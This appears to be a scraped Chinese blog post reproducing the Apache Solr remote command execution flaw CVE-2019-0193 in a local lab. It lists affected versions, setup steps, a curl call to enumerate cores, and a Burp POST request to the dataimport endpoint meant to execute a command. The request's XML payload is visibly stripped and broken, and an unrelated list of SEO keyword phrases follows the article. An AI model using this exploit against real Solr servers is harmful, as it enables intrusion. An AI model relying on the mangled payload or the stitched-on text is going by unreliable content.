Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,今天就跟大家聊聊有关Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获
千家信息网最后更新 2025年12月01日Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析
今天就跟大家聊聊有关Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
0x01 影响范围
Apache Solr < 8.2.0
0x02 环境搭建
下载地址:
https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip
在本地解压,进入solr-7.7.2目录,执行命令
bin/solr -e dih (前提:java环境)
然后访问http://localhost:8983/solr即可访问环境
0x03 漏洞利用
首先我们可以通过接口
curl http://127.0.0.1:8983/solr/admin/cores
来获取所有 core 信息,下面我们构造 payload 需要 name 信息
在Burp中发送以下POC即可执行命令弹出计算器,下面的
POST /solr//dataimport HTTP/1.1 Host: 127.0.0.1:8983Content-Length: 763User-Agent: Mozilla/5.0Content-type: application/x-www-form-urlencodedConnection: closecommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=&name=dataimport&dataConfig= url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" />
执行效果如下:
看完上述内容,你们对Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。
命令
漏洞
内容
环境
示例
分析
信息
前提
可以通过
地址
接口
效果
更多
目录
知识
篇文章
范围
行业
计算器
资讯
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
杭州同欣网络技术有限公司建材
gi数据库
事件管理服务器应用软件
会中网络技术有限公司
sql数据库实例改名
防网络安全手抄报字
怎样选择数据库设计
数据库日期转换成文本格式
cipc数据库app
数据库文件种类
什么技术可以提高软件开发效率
常见的网络安全问题分几大类
群晖和文件服务器哪个好
数据库的介绍ppt
交管平台服务器有多大
路由器的dhcp服务器怎么设置
国际服体验服如何切换服务器
小学网络安全周ppt
网络技术研究基地
网络安全宣传片制作流程
山东戴尔服务器零售商云空间
网络安全校园宣传周
国际服体验服如何切换服务器
互联网科技股基金最新排名
广电中计算机网络技术的应用
客户端和服务器怎么建立链接
g20网络安全保障方案
北京数据软件开发设施厂家现货
工业相机vb软件开发包
深圳天方达软件开发公司
